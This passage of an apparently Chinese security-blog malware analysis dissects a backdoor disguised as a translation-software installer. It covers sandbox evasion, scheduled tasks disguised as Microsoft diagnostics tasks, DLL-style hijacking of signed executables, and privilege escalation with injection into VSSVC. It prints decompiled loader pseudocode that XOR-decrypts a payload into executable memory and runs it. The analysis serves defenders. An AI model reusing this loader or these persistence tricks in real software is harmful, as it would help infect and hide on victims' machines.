12px;height: auto !important;" data-imgfileid="100028177" data-aistatus="1" src="https://wechat2rss.xlab.app/img-proxy/?k=67e41677&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FjHUbrwW0VwX9eg8BTcVu50elYfFCGlXnFAeZ8I0lxLUaE4ufkUzt594Mp1FqJZNqb9A05ZmdqgDCibbvp6VFvSzxGqJ5ecic1KiagJZlE7Itsg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p data-line="25" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">用户被引导下载的安装包，在外观上完整还原了一款普通翻译软件的 NSIS 安装向导。用户一路点击“下一步”完成安装时，后门植入流程同步执行：<img class="rich_pages wxw-img" data-ratio="0.7203219315895373" data-type="png" data-w="497" style="display: block;max-width: 100%;margin: 0.5em auto 1em;border-radius: 4px;box-shadow: rgba(0, 0, 0, 0.12) 0px 2px 12px;height: auto !important;" data-imgfileid="100028175" data-aistatus="1" src="https://wechat2rss.xlab.app/img-proxy/?k=8d42a3b2&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FjHUbrwW0VwXmUISHdXKWYyH823apQCeuoLGJ8D1WMw3ufdZm2hg7jFVibNE5tgn7ptaPJP9eGSv7icRa6jmp8UkO4lXpeOwgaDhR4hJ8ibXdxw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><hr style="border-style: solid;border-width: 2px 0px 0px;border-color: rgba(0, 0, 0, 0.1);transform-origin: 0px 0px;transform: scale(1, 0.5);height: 1px;margin: 2em 0px;background: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.1), rgba(0, 0, 0, 0));"/><h2 data-line="30" style="display: block;width: fit-content;padding: 0.3em 1.2em;margin: 2.5em auto 1.5em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);font-size: calc(19.2px);font-weight: bold;text-align: center;border-radius: 6px;box-shadow: none;"><span leaf="">三、样本执行流程：延迟释放与伪装持久化</span></h2><p data-line="32" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">安装包运行后不会立即释放恶意载荷，而是等待用户按流程完整点完安装向导，借真实用户交互规避沙箱环境。随后，样本在 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">%APPDATA%\Roaming</span></code><span leaf=""> 目录下创建两个以 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">comain_</span></code><span leaf=""> 为前缀的子目录，分别释放两组恶意文件。</span></p><p data-line="34" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">持久化阶段，样本将两个主 EXE 模块注册为伪装的系统计划任务。任务被挂靠到 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">\Microsoft\Windows\Application Experience\</span></code><span leaf=""> 路径下，命名为 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">Diagnostics</span></code><span leaf=""> 与 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">Diagnostics2</span></code><span leaf="">，并照搬微软原生任务的官方描述（“允许用户在 AD RMS 权限策略模板……”）。从任务计划程序中看，这两个任务很容易被误认为系统组件。<img class="rich_pages wxw-img" data-ratio="0.2797858099062918" data-type="png" data-w="747" style="display: block;max-width: 100%;margin: 0.5em auto 1em;border-radius: 4px;box-shadow: rgba(0, 0, 0, 0.12) 0px 2px 12px;height: auto !important;" data-imgfileid="100028174" data-aistatus="1" src="https://wechat2rss.xlab.app/img-proxy/?k=5f506c2f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FjHUbrwW0VwXgza2Ciba78rfrlN85CLps8RuIkX46IYzDicFfia1esZDbO3vFB7dxA6thT9zW2LibrGQZyjLGFA0Em4YoVlxnfjicrLicf5J4aibiaHs%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/><img class="rich_pages wxw-img" data-ratio="0.24765729585006693" data-type="png" data-w="747" style="display: block;max-width: 100%;margin: 0.5em auto 1em;border-radius: 4px;box-shadow: rgba(0, 0, 0, 0.12) 0px 2px 12px;height: auto !important;" data-imgfileid="100028179" data-aistatus="1" src="https://wechat2rss.xlab.app/img-proxy/?k=822bc10c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FjHUbrwW0VwVZEWOYcMnIjwGFhuLvC3DYpE6B1RWrXhfljLoJapazU5d9k5j4rqVpAZwDATZlaV7MVOQoyRaC4vcjiaCNMich85c5IibhDIVQDU%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p data-line="40" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">第一组：comain_ev2c34 套件</span></strong></p><p style="text-align: center;margin-bottom: 0px;"><img class="rich_pages wxw-img" data-ratio="0.6969147005444646" data-s="300,640" data-type="jpeg" data-w="551" style="width: 546px;height: auto !important;" data-croporisrc="https://mmbiz.qpic.cn/mmbiz_png/jHUbrwW0VwWotQHRto0ziajtLUAFopBHxVyS76ePjyaktL0jIE67qRzRX3MPicyDyXSZMCQnpicGibygb1DbNclJMXMH0KujB1Ll86x5icmiaZcEo/640?wx_fmt=png&amp;from=appmsg" data-cropx2="551.9871794871794" data-cropy1="5.064102564102564" data-cropy2="389.9358974358974" data-imgfileid="100028217" data-aistatus="1" src="https://wechat2rss.xlab.app/img-proxy/?k=2752b0a1&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FjHUbrwW0VwXjJoRoxVqicMtSibGO6Y4u3IpWvNKiaPDEMm34a3iaxyOlYB4LVMh22d9vX8ZTlQBib67leicFXnSf9hYcylnEH8dNmlXrUg3vdyo2M%2F640%3Fwx_fmt%3Djpeg"/></p><p data-line="53" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">第二组：comain_ev2f79 套件</span></strong></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-ratio="0.6709090909090909" data-s="300,640" data-type="jpeg" data-w="550" style="width: 546px;height: auto !important;" data-croporisrc="https://mmbiz.qpic.cn/sz_mmbiz_png/jHUbrwW0VwXuW06wxsxmliauIQUjsl2TNmR1ZGt7gy3kWX9lOMPwOptnF2L2Cu9icf6uH6qtQP0ibXPSiceqNjgKWRbfc7IzyTibnKCRT8cPVnNg/640?wx_fmt=png&amp;from=appmsg" data-cropx2="550.9560439560439" data-cropy2="370.34798534798534" data-imgfileid="100028216" data-aistatus="1" src="https://wechat2rss.xlab.app/img-proxy/?k=fbc41a54&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FjHUbrwW0VwXwXpmB5kNmia5nftgEoEMvMiaibY9w2HMEHobj9XyZdZBIeWFYsW0Pnia295xeNullkcnUddd7C9dZjkdD7VCcIVsBzxV2FGuPVTw%2F640%3Fwx_fmt%3Djpeg"/></p><p data-line="65" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">下图左侧 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">ev2c34.exe</span></code><span leaf=""> 保留“深圳市世强电脑科技有限公司”签名，右侧 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">ev2f79.exe</span></code><span leaf=""> 保留 “Hangzhou Shunwang Technology Co., Ltd” 签名。两个 EXE 宿主都带有原始知名厂商数字签名，这也是近白利用最核心的伪装点：静态层面看起来接近合法程序，运行后却进入恶意执行链。<img class="rich_pages wxw-img" data-ratio="0.3616118769883351" data-type="png" data-w="943" style="display: block;max-width: 100%;margin: 0.5em auto 1em;border-radius: 4px;box-shadow: rgba(0, 0, 0, 0.12) 0px 2px 12px;height: auto !important;" data-imgfileid="100028180" data-aistatus="1" src="https://wechat2rss.xlab.app/img-proxy/?k=beb0583a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FjHUbrwW0VwX3DicFic9a7gXanKAK4ia9dMAbGBRQKeoIGHrrJ1MTdBTKSNOs59eDibTXy1uSJDlfu9Lm0Z99X1e8qMFmiaZLH5YSa4g6hzmZsiaLk%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><hr style="border-style: solid;border-width: 2px 0px 0px;border-color: rgba(0, 0, 0, 0.1);transform-origin: 0px 0px;transform: scale(1, 0.5);height: 1px;margin: 2em 0px;background: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.1), rgba(0, 0, 0, 0));"/><h2 data-line="70" style="display: block;width: fit-content;padding: 0.3em 1.2em;margin: 2.5em auto 1.5em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);font-size: calc(19.2px);font-weight: bold;text-align: center;border-radius: 6px;box-shadow: none;"><span leaf="">四、近白利用：MFC 消息回调劫持 + XOR 0x36 自解密</span></h2><h3 data-line="72" style="padding-left: 12px;border-left: 4px solid rgb(0, 82, 217);border-bottom: 1px dashed rgb(0, 82, 217);margin: 2em 8px 0.75em 0px;color: rgb(51, 51, 51);font-size: calc(19.2px);font-weight: bold;line-height: 1.2;"><span leaf="">4.1 劫持切入点：</span><code style="font-size: 17.28px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">CWnd::ReflectChildNotify</span></code></h3><p data-line="74" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">以 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">ev2f79.exe</span></code><span leaf="">（篡改自顺网的恶意主程序）为例。攻击者没有选择替换 EntryPoint 或 TLS 回调这类更显眼的劫持位置，而是把 MFC 框架中用于</span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">处理子窗口通知的反射函数 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">CWnd::ReflectChildNotify</span></code></strong><span leaf=""> 改写为 Loader 入口。</span></p><p data-line="76" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">应用进入消息循环后，</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">WM_VSCROLL</span></code><span leaf="">、</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">WM_HSCROLL</span></code><span leaf="">、</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">WM_CTLCOLOR*</span></code><span leaf="">、</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">WM_DRAWITEM</span></code><span leaf="">（528）等常规 UI 消息都会触发该函数。也就是说，程序只要正常跑起来，就会自动拉起恶意代码。</span></p><div style="margin: 10px 8px;border-radius: 8px;border: 1px solid rgb(200, 208, 219);background: rgb(234, 238, 243);overflow: hidden;"><p style="text-align: right;padding: 4px 10px 2px;background: rgb(212, 218, 226);border-bottom: 1px solid rgb(200, 208, 219);"><span style="font-size: 11px;line-height: 1.4;color: rgb(58, 80, 112);font-family: &#34;Fira Code&#34;, Menlo, &#34;Operator Mono&#34;, Consolas, Monaco, monospace;letter-spacing: 0px;"><span leaf="">cpp</span></span></p><pre style="margin: 0px;border-width: medium;border-style: none;border-color: currentcolor;border-image: initial;border-radius: 0px;box-shadow: none;background: transparent;font-size: 14.4px;line-height: 1.5;overflow-x: auto;padding: 0px !important;"><code language="cpp" style="display: block;padding: 0.5em 1em 1em;overflow-x: auto;text-indent: 0px;color: rgb(0, 25, 58);white-space: nowrap;word-break: normal;overflow-wrap: normal;margin: 0px;font-size: inherit;line-height: inherit;border-width: medium;border-style: none;border-color: currentcolor;border-image: initial;border-radius: 0px;background: transparent !important;"><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span style="color: rgb(0, 72, 171);"><span leaf="">int</span></span><span leaf=""> __thiscall </span><span style="color: rgb(0, 72, 171);"><span leaf="">CWnd::ReflectChildNotify</span></span><span leaf="">(...)</span></span><span leaf="">{</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">if</span></span><span leaf=""> (a2 &gt; </span><span style="color: rgb(76, 129, 201);"><span leaf="">0x111</span></span><span leaf="">) {</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">if</span></span><span leaf=""> (a2 &lt; </span><span style="color: rgb(76, 129, 201);"><span leaf="">0x114</span></span><span leaf=""> || a2 &gt; </span><span style="color: rgb(76, 129, 201);"><span leaf="">0x115</span></span><span leaf=""> &amp;&amp; a2 != </span><span style="color: rgb(76, 129, 201);"><span leaf="">528</span></span><span leaf="">)</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">return</span></span><span style="color: rgb(0, 72, 171);"><span leaf="">loader_read_xor36_and_exec_file</span></span><span leaf="">();</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">    }</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">if</span></span><span leaf=""> (a2 != </span><span style="color: rgb(76, 129, 201);"><span leaf="">273</span></span><span leaf="">) {</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">if</span></span><span leaf=""> (a2 &gt; </span><span style="color: rgb(76, 129, 201);"><span leaf="">0x2F</span></span><span leaf=""> &amp;&amp; a2 != </span><span style="color: rgb(76, 129, 201);"><span leaf="">57</span></span><span leaf="">) {</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">            ...</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">            result = </span><span style="color: rgb(0, 72, 171);"><span leaf="">loader_read_xor36_and_exec_file</span></span><span leaf="">();</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">if</span></span><span leaf=""> (!*a5) </span><span style="color: rgb(0, 72, 171);"><span leaf="">return</span></span><span style="color: rgb(76, 129, 201);"><span leaf="">0</span></span><span leaf="">;</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">return</span></span><span leaf=""> result;</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">        }</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">return</span></span><span style="color: rgb(0, 72, 171);"><span leaf="">loader_read_xor36_and_exec_file</span></span><span leaf="">();</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">    }</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">    ...</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">}</span></p></code></pre></div><h3 data-line="97" style="padding-left: 12px;border-left: 4px solid rgb(0, 82, 217);border-bottom: 1px dashed rgb(0, 82, 217);margin: 2em 8px 0.75em 0px;color: rgb(51, 51, 51);font-size: calc(19.2px);font-weight: bold;line-height: 1.2;"><span leaf="">4.2 Loader 逻辑：文件名解密 + XOR 0x36 自解密执行</span></h3><p data-line="99" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">loader_read_xor36_and_exec_file</span></code><span leaf=""> 承担完整装载动作：先解密同目录下的恶意文件名 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">otrm.oi</span></code><span leaf="">，再以 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">XOR 0x36</span></code><span leaf=""> 对整个文件逐字节解密，最后直接跳转执行。原始 EXE 相对官方版本只改动了少量函数，整体特征高度贴近合法程序，静态识别难度明显提高：</span></p><div style="margin: 10px 8px;border-radius: 8px;border: 1px solid rgb(200, 208, 219);background: rgb(234, 238, 243);overflow: hidden;"><p style="text-align: right;padding: 4px 10px 2px;background: rgb(212, 218, 226);border-bottom: 1px solid rgb(200, 208, 219);"><span style="font-size: 11px;line-height: 1.4;color: rgb(58, 80, 112);font-family: &#34;Fira Code&#34;, Menlo, &#34;Operator Mono&#34;, Consolas, Monaco, monospace;letter-spacing: 0px;"><span leaf="">cpp</span></span></p><pre style="margin: 0px;border-width: medium;border-style: none;border-color: currentcolor;border-image: initial;border-radius: 0px;box-shadow: none;background: transparent;font-size: 14.4px;line-height: 1.5;overflow-x: auto;padding: 0px !important;"><code language="cpp" style="display: block;padding: 0.5em 1em 1em;overflow-x: auto;text-indent: 0px;color: rgb(0, 25, 58);white-space: nowrap;word-break: normal;overflow-wrap: normal;margin: 0px;font-size: inherit;line-height: inherit;border-width: medium;border-style: none;border-color: currentcolor;border-image: initial;border-radius: 0px;background: transparent !important;"><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span style="color: rgb(0, 72, 171);"><span leaf="">int</span></span><span leaf=""> __cdecl </span><span style="color: rgb(0, 72, 171);"><span leaf="">loader_read_xor36_and_exec_file</span></span><span leaf="">()</span></span><span leaf="">{</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(115, 129, 145);"><span leaf="">// --- 运行时解密恶意文件名 ---</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">    encNameDwords[</span><span style="color: rgb(76, 129, 201);"><span leaf="">0</span></span><span leaf="">] = </span><span style="color: rgb(76, 129, 201);"><span leaf="">0x44393B46</span></span><span leaf="">;  </span><span style="color: rgb(115, 129, 145);"><span leaf="">// 解密后得到 &#34;otrm.oi&#34;</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">    encNameDwords[</span><span style="color: rgb(76, 129, 201);"><span leaf="">1</span></span><span leaf="">] = </span><span style="color: rgb(76, 129, 201);"><span leaf="">0x27404605</span></span><span leaf="">;</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">    ...</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">for</span></span><span leaf=""> (i = </span><span style="color: rgb(76, 129, 201);"><span leaf="">61240</span></span><span leaf="">; ; v1 = i) {</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">        *((_BYTE *)encNameDwords + v0) = v1 ^ (*((_BYTE *)encNameDwords + v0) - v2);</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">if</span></span><span leaf=""> (++v0 &gt;= nameLen) </span><span style="color: rgb(0, 72, 171);"><span leaf="">break</span></span><span leaf="">;</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">        v2 = </span><span style="color: rgb(0, 72, 171);"><span leaf="">BYTE1</span></span><span leaf="">(i);</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">    }</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">pGetModuleFileNameA</span></span><span leaf="">(</span><span style="color: rgb(76, 129, 201);"><span leaf="">0</span></span><span leaf="">, pathBuf, </span><span style="color: rgb(76, 129, 201);"><span leaf="">260u</span></span><span leaf="">);</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">pCreateFileA</span></span><span leaf="">(pathBuf, </span><span style="color: rgb(76, 129, 201);"><span leaf="">0x80000000</span></span><span leaf="">, </span><span style="color: rgb(76, 129, 201);"><span leaf="">1u</span></span><span leaf="">, </span><span style="color: rgb(76, 129, 201);"><span leaf="">0</span></span><span leaf="">, </span><span style="color: rgb(76, 129, 201);"><span leaf="">3u</span></span><span leaf="">, </span><span style="color: rgb(76, 129, 201);"><span leaf="">128u</span></span><span leaf="">, </span><span style="color: rgb(76, 129, 201);"><span leaf="">0</span></span><span leaf="">);</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">    fileSize = </span><span style="color: rgb(0, 72, 171);"><span leaf="">pGetFileSize</span></span><span leaf="">(hFile, </span><span style="color: rgb(76, 129, 201);"><span leaf="">0</span></span><span leaf="">);</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">if</span></span><span leaf=""> (fileSize) {</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">        payloadEntry = </span><span style="color: rgb(0, 72, 171);"><span leaf="">pVirtualAlloc</span></span><span leaf="">(</span><span style="color: rgb(76, 129, 201);"><span leaf="">0</span></span><span leaf="">, fileSize, </span><span style="color: rgb(76, 129, 201);"><span leaf="">0x3000</span></span><span leaf="">, PAGE_EXECUTE_READWRITE);</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">pReadFile</span></span><span leaf="">(hFile, payloadEntry, fileSize, &amp;bytesRead, </span><span style="color: rgb(76, 129, 201);"><span leaf="">0</span></span><span leaf="">);</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(115, 129, 145);"><span leaf="">// --- XOR 0x36 解密 payload ---</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">for</span></span><span leaf=""> (j = </span><span style="color: rgb(76, 129, 201);"><span leaf="">0</span></span><span leaf="">; j &lt; bytesRead; ++j)</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">            *((_BYTE *)payloadEntry + j) ^= </span><span style="color: rgb(76, 129, 201);"><span leaf="">0x36u</span></span><span leaf="">;</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">return</span></span><span style="color: rgb(0, 72, 171);"><span leaf="">payloadEntry</span></span><span leaf="">();       </span><span style="color: rgb(115, 129, 145);"><span leaf="">// 直接跳转执行</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">    }</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">}</span></p></code></pre></div><hr style="border-style: solid;border-width: 2px 0px 0px;border-color: rgba(0, 0, 0, 0.1);transform-origin: 0px 0px;transform: scale(1, 0.5);height: 1px;margin: 2em 0px;background: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.1), rgba(0, 0, 0, 0));"/><h2 data-line="130" style="display: block;width: fit-content;padding: 0.3em 1.2em;margin: 2.5em auto 1.5em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);font-size: calc(19.2px);font-weight: bold;text-align: center;border-radius: 6px;box-shadow: none;"><span leaf="">五、非 PE 载荷的对抗护甲</span></h2><p data-line="132" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">被解密并装入内存的非 PE 模块（</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">.oi / .vc / .ti / .er</span></code><span leaf="">）使用了同一套反分析护甲。反编译视角下可以看到大量异或表达式与花指令，整体呈现典型的 OLLVM 风格保护。<img class="rich_pages wxw-img" data-ratio="0.733140655105973" data-type="png" data-w="1038" style="display: block;max-width: 100%;margin: 0.5em auto 1em;border-radius: 4px;box-shadow: rgba(0, 0, 0, 0.12) 0px 2px 12px;height: auto !important;" data-imgfileid="100028183" data-aistatus="1" src="https://wechat2rss.xlab.app/img-proxy/?k=df4a22d1&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FjHUbrwW0VwWzOjupzF6t3TPqZG0AHEZI1HS9s1Ricz0C4Fpm1xtteK463fbq5DiamvT0DEIwAqvjR1S2PCaCcpg1M2HyH7Q0zxic1LIib1myXyE%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-ratio="0.3978102189781022" data-s="300,640" data-type="jpeg" data-w="548" style="width: 546px;height: auto !important;" type="block" data-croporisrc="https://mmbiz.qpic.cn/sz_mmbiz_png/jHUbrwW0VwWBzlvUnIicUBsKZasQwiaddibtVDFBIqEK308tFpAY5ZEtcnLIEN7emkjqYxZjgRgicLuuricYo4oibwuPI0OqQ7Y7nd0leXZB5LeW4/640?wx_fmt=png&amp;from=appmsg" data-cropx1="3.032727272727273" data-cropx2="551.9563636363637" data-cropy1="2.021818181818182" data-cropy2="221.38909090909092" data-imgfileid="100028192" data-aistatus="1" src="https://wechat2rss.xlab.app/img-proxy/?k=4a8e6b75&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FjHUbrwW0VwUSnB4pVqsaltLhVTcS2XesiaCn9uvnqcezrwIloNOwfDJgq0SWwx1Q6icJncefvSWjl7NM06laly3fES6s4j843vo4Hcz7iaiamGs%2F640%3Fwx_fmt%3Djpeg"/></p><p data-line="142" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">otrm.oi</span></code><span leaf=""> 被装载后会继续调用 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">SetIoC</span></code><span leaf=""> 导出函数。该函数先申请 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">SeDebugPrivilege</span></code><span leaf=""> 提权，随后拉起系统 </span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">VSSVC（卷影副本）服务</span></strong><span leaf="">，再通过线程池注入将 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">yinma.vc</span></code><span leaf=""> 与 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 